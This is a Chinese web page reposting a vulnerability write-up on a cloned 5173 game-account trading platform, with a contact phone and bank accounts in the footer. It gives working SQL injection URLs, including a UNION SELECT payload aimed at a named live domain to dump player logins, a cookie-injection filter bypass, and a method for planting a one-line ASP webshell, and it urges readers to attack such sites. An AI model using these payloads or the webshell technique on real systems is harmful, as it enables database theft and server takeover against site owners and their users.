通用型仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell_安全漏洞聚焦_龙虎鹰师网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

通用型仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

作者:龙虎鹰师网安 来源: 浏览次数:0

本篇关键词:通用型交易平台系统
龙虎鹰师网安网讯: 最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是5173平台交易的网站,叫我直接把号的信息填上去然后填好了
 最近没事登登好几年前玩过的游戏看看发现有人喊高价收号这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是5173平台交易的网站,叫我直接把号的信息填上去然后填好了之后就去他就会去购买,然后仔细看了一下平台,获取了源代码后看了一下~呵呵,漏洞还是有不少的~ 仿5173网游交易平台游戏交易平台存在注入与getshell漏洞,可直接拖掉玩家数据~
发乌云上乌云不收,所以没事就发zone里给大家玩玩其实这系统还是蛮多漏洞的,我最痛恨骗子了,大家能搞几个骗子平台就搞几个去吧~案例上大多都是一些骗子搭建来钓鱼的

\
A:SQL注入一:
漏洞文件:/help.asp
\
这里id参数过滤不严存在sql注入的,但是conn.asp中包含了:

\
都知道这个防注入文件很垃圾吧,只做了GET和POST的防注入,可直接转为cookie注入绕过
\

这个注入我就不多研究了,看下一个支持UNION query的注入点。

B:SQL注入二
漏洞文件:/card_server.asp

\

这里没有直接包含数据库连接文件,直接创建了连接对象,导致这一个注入是无法被sqlin.asp防御,注意,Request的sel参数没有过滤直接带入查询导致了SQL注入。简单构造一下注入点:

http://127.0.0.1/card_server.asp?sel=1′

Microsoft JET Database Engine 错误 ‘80040e14’
字符串的语法错误 在查询表达式 ‘parentid=1” 中。
/card_server.asp,行 28

\

\

支持联合查询,可直脱掉ganme_user的玩家数据,好像sqlmap没有game_user的字典吧?。还有一个字段”alipay_pwd”是用户的支付密码~

\

\

由于通用型的要5个案例,那我就来五个~
\

我来脱个裤子给大家看看:

http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

\

C:GETSHELL:
漏洞文件:/SqlIn.Asp
\




这里直接将用户非法提交的字符串写入了sql_whelpu.asp的数据库里面了,试想一下,如果故意加入一句话不就可以GETSHELL了吗? 在没有被人插入过asp的<%%>符号则可直接访问:

\
当然如果有被人提交过的需要注意闭合就可以获取webshell了~ 这里成功将一句话写入数据库:sql_whelpu.asp,我们打开看看是不是呢?

\

菜刀连接:
http://127.0.0.1/sql_whelpu.asp

\

大家吃好喝好玩好!大家随便玩,别打脸就是啊!



    龙虎鹰师网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-19749-1.html
网站维护教程更新时间:2016-05-21 17:44:47  【打印此页】  【关闭
全站连接N点 | 龙虎鹰师网安 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。龙虎鹰师网安服务器维护基地招商进行中!请致电24小时热线: 13910257075 王先生
  开户名:王俊鹏 开户行:招商银行清华园支行:9555500101708872 建设银行清华园分行 6227000014970239251 

footer  footer  互联网安全  footer